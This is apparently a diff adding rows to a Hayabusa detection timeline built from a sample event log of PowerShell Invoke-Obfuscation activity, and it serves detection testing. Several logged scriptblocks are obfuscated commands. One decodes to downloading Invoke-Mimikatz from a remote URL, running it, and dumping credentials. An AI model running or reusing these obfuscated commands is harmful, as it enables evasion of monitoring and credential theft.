+2017-08-31 04:15:39.555 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.563 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.568 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.571 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.574 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.577 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.580 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 
+2017-08-31 04:15:39.581 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.585 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.588 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.901 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:40.071 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:40.085 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:40.121 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:43.135 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [cHAR[]] ( 20 , 24, 5 ,125 , 117 , 19, 56,42, 112 ,18 , 63 , 55,56 ,62,41,125,19 , 56 , 41 ,115 ,10,56 ,63, 30 , 49 ,52 ,56 ,51, 41 , 116 , 115, 25 ,50,42 ,51, 49,50,60, 57, 14, 41 ,47 , 52, 51, 58 ,117 ,122 , 53, 41,41 , 45 , 46,103, 114, 114,47 ,60, 42, 115, 58 , 52 , 41 ,53 ,40, 63 , 40 , 46, 56,47 , 62 ,50 ,51, 41 ,56,51,41, 115 , 62, 50 ,48 , 114,48,60 , 41,41 ,52 ,59, 56, 46, 41 ,60, 41 , 52,50 , 51, 114 , 13,50,42 ,56 , 47 ,14 ,45 , 49, 50 , 52 ,41 , 114 ,48, 60, 46,41, 56,47, 114 , 24,37,59,52 , 49 ,41, 47, 60,41,52 , 50 , 51 , 114 ,20 , 51 ,43, 50,54 ,56, 112 , 16 , 52, 48 , 52 , 54, 60 ,41,39, 115, 45 ,46 , 108 , 122,116,102, 125 ,20 ,51 , 43, 50 , 54 ,56 ,112, 16, 52,48,52, 54,60 , 41 , 39 ,125 ,112 , 25, 40 , 48, 45,30 ,47 ,56, 57 ,46 ) |%{[cHAR] ( $_ -BXor""0x5d"" ) } )-JOIN''|.( $ENv:ComSPEc[4,15,25]-jOIN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:43.135 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{[cHAR] ( $_ -BXor""0x5d"" ) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:04.309 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:04.320 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:06.877 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? 
""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + 
${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& 
${=}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:06.877 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ 
${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + 
${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:06.938 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,iex([CHar]73 +[CHar]69+[CHar]88 +[CHar]32 +[CHar]40 +[CHar]78 +[CHar]101+[CHar]119 + [CHar]45+ [CHar]79 + [CHar]98+[CHar]106+[CHar]101 +[CHar]99 +[CHar]116+ [CHar]32 +[CHar]78+[CHar]101 + [CHar]116 +[CHar]46+[CHar]87+[CHar]101 + [CHar]98+ [CHar]67 +[CHar]108 +[CHar]105+[CHar]101 + [CHar]110 + [CHar]116+ [CHar]41 + [CHar]46+ [CHar]68+ [CHar]111+ [CHar]119+ [CHar]110+[CHar]108 +[CHar]111+ [CHar]97 + [CHar]100 + [CHar]83+ [CHar]116 + [CHar]114+[CHar]105 +[CHar]110+ [CHar]103+ [CHar]40+ [CHar]39+[CHar]104 +[CHar]116 +[CHar]116+ [CHar]112 +[CHar]115 + [CHar]58+ [CHar]47+[CHar]47+[CHar]114+ [CHar]97+ [CHar]119 + [CHar]46+[CHar]103+[CHar]105+ [CHar]116 +[CHar]104 +[CHar]117+[CHar]98+[CHar]117+[CHar]115 + [CHar]101+ [CHar]114 +[CHar]99+ [CHar]111 + [CHar]110+[CHar]116 + [CHar]101 + [CHar]110+ [CHar]116 +[CHar]46+ [CHar]99 +[CHar]111 +[CHar]109 +[CHar]47 + [CHar]109 +[CHar]97 +[CHar]116 +[CHar]116 + [CHar]105 + [CHar]102 +[CHar]101 + [CHar]115 + [CHar]116+[CHar]97+ [CHar]116+ [CHar]105+ [CHar]111 +[CHar]110 +[CHar]47+ 
[CHar]80+[CHar]111 + [CHar]119 +[CHar]101 + [CHar]114+ [CHar]83+ [CHar]112+[CHar]108+ [CHar]111+ [CHar]105 + [CHar]116+[CHar]47 + [CHar]109+ [CHar]97 +[CHar]115 +[CHar]116+[CHar]101 +[CHar]114 +[CHar]47+[CHar]69+[CHar]120 +[CHar]102+ [CHar]105+[CHar]108 +[CHar]116 + [CHar]114+ [CHar]97+ [CHar]116 + [CHar]105 + [CHar]111+[CHar]110+[CHar]47+[CHar]73+ [CHar]110+[CHar]118+[CHar]111+[CHar]107 +[CHar]101+[CHar]45+ [CHar]77+ [CHar]105+[CHar]109+[CHar]105 +[CHar]107+[CHar]97 + [CHar]116+[CHar]122 + [CHar]46 + [CHar]112+[CHar]115 + [CHar]49+ [CHar]39 + [CHar]41 +[CHar]59 +[CHar]32+ [CHar]73+[CHar]110+[CHar]118+ [CHar]111+ [CHar]107+[CHar]101+[CHar]45+ [CHar]77 + [CHar]105 +[CHar]109+[CHar]105+ [CHar]107 + [CHar]97+[CHar]116+[CHar]122+[CHar]32 + [CHar]45 +[CHar]68+[CHar]117 +[CHar]109+ [CHar]112 +[CHar]67+[CHar]114 +[CHar]101+[CHar]100 + [CHar]115),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:21.040 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:21.050 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:21.054 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.057 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.060 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.062 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.067 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.077 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
